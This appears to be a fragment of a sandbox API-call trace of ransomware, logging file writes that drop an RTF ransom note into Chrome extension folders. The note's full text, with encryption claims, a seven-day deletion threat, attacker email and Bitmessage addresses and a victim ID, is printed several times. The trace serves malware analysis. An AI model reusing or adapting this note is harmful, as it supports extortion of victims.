\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0287.703] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.704] CloseHandle (hObject=0x2f0) returned 1 [0287.704] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0287.704] GetLastError () returned 0x2 [0287.704] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.704] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 